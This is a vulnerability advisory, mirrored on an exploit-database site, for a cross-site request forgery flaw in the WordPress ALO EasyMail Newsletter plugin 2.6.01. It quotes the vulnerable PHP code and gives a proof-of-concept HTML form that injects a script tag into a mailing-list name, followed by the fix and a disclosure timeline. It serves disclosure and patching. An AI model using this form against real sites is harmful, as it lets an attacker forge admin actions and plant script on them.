Vulners
Lucene search
WordPress ALO EasyMail Newsletter 2.6.01 CSRF
`# Exploit Title: Wordpress ALO EasyMail Newsletter plugin cross-site request forgery vulnerability
# Software Link: https://wordpress.org/plugins/alo-easymail/
# Affected Version: 2.6.01
# Exploit Author: Mohsen Lotfi
# Contact: [email protected]
# Twitter: fox_one_fox_one
# Date: 01-16-2016
#####################
1. Description
#####################
The plugin contains a CSRF vulnerability, which can be exploited to perform a script insertion attack.
script insertion happens in wp-content/plugins/alo-easymail/pages/alo-easymail-admin-options.php :
case "save_list": // SAVE a mailing list (add or update)
if ( isset($_REQUEST['submit_list']) ) {
//$list_name = stripslashes( trim( $_POST['elp_list_name'] ) );
// List name
$list_name = array();
foreach ( $languages as $key => $lang ) {
if (isset($_POST['listname_'.$lang]) ) $list_name[$lang] = stripslashes(trim($_POST['listname_'.$lang])); /* script insertion here */
}
$list_available = stripslashes( trim( $_POST['elp_list_available'] ) );
$list_order = stripslashes( trim( $_POST['elp_list_order'] ) );
if ( $list_name && $list_available && is_numeric($list_order) ) {
$mailinglists = alo_em_get_mailinglists ( 'hidden,admin,public' );
if ( $list_id ) { // update
$mailinglists [$list_id] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order );
} else { // or add a new
if ( empty($mailinglists) ) { // if 1st list, skip index 0
$mailinglists [] = array ( "name" => "not-used", "available" => "deleted", "order" => "");
}
$mailinglists [] = array ( "name" => $list_name, "available" => $list_available, "order" => $list_order);
}
if ( alo_em_save_mailinglists ( $mailinglists ) ) {
unset ( $list_id );
unset ( $list_name );
unset ( $list_available );
unset ( $list_order );
echo '<div id="message" class="updated fade"><p>'. __("Updated", "alo-easymail") .'</p></div>';
} else {
echo '<div id="message" class="error"><p>'. __("Error during operation.", "alo-easymail") .'</p></div>';
}
} else {
echo '<div id="message" class="error"><p>'. __("Inputs are incompled or wrong. Please check and try again.", "alo-easymail") .'</p></div>';
}
}
break;
#####################
2. Proof of Concept
#####################
Login as regular user then:
<form method="post" action="http://localhost/wordpress4.4/wp-admin/edit.php?post_type=newsletter&page=alo-easymail/pages/alo-easymail-admin-options.php">
<input type="hidden" name="listname_en" value="<script>alert('xss')</script>">
<input type="hidden" name="elp_list_available" value="hidden">
<input type="hidden" name="elp_list_order" value="0">
<input type="hidden" name="user_ID" value="1">
<input type="hidden" name="task" value="save_list">
<input type="hidden" name="list_id" value="">
<input type="submit" name="submit_list" value="Trigger!">
</form>
#####################
3. Sulotion
#####################
Update to version 2.7.0
https://wordpress.org/plugins/alo-easymail/changelog/
#####################
4. Report Timeline
#####################
01-16-2016 : Vulnerability discovered.
01-25-2016 : Vendor notified of vulnerability.
02-07-2016 : Vendor replied and released fixed version.
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
16 Feb 2016 00:00Current
0.1Low risk
Vulners AI Score0.1